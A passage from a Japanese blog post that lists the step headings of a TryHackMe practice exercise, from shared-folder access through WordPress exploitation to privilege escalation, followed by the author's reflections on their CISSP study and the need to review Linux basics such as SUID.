　2.共有フォルダーへ侵入
　3.共有フォルダーからダウンロードしたファイルの解析
　4.WordPressの探索
　5.WordPress脆弱性を悪用し初期侵入
　6.権限昇格

感想

楽しかったです!
上述の通り、CISSP合格後のアウトプットのために始めたので、終始「これCISSP(の練習問題)でやったところだ！」とテンション上がりっぱなしでした。
しかし、以前にLinuxの勉強はしていてそれなりにできると思っていたのですが、SUIDなどについて一瞬、「それって何だっけ？」となってしまう場面があり、愕然としました。
もう数年Linuxの業務から離れていたので知っていて当たり前のことが曖昧になっているようです。
新しいスキルを身に付けるだけでなく、一度勉強したことも定期的に振り返らないとまずいですね。
この本でTryHackMeの取り組み方については理解できたと思うので、これからはLinuxの復習をしつつどんどん新しいルームにも取り組んでみようと思います。